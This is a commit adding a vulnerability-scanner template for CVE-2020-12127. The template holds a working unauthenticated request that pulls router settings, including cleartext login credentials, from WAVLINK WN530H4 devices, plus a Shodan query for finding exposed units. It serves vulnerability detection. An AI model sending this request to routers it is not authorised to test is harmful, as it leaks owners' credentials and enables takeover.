Create CVE-2020-12127.yaml
parent
689a07d542
commit
df3cf03c10
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-12127
|
||||
|
||||
info:
|
||||
name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12127
|
||||
- https://cerne.xyz/bugs/CVE-2020-12127
|
||||
metadata:
|
||||
shodan-query: http.html:"Wavlink"
|
||||
verified: "true"
|
||||
tags: access,control,cve,2020
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'Login'
|
||||
- 'Password'
|
||||
- 'AuthMode'
|
Loading…
Reference in New Issue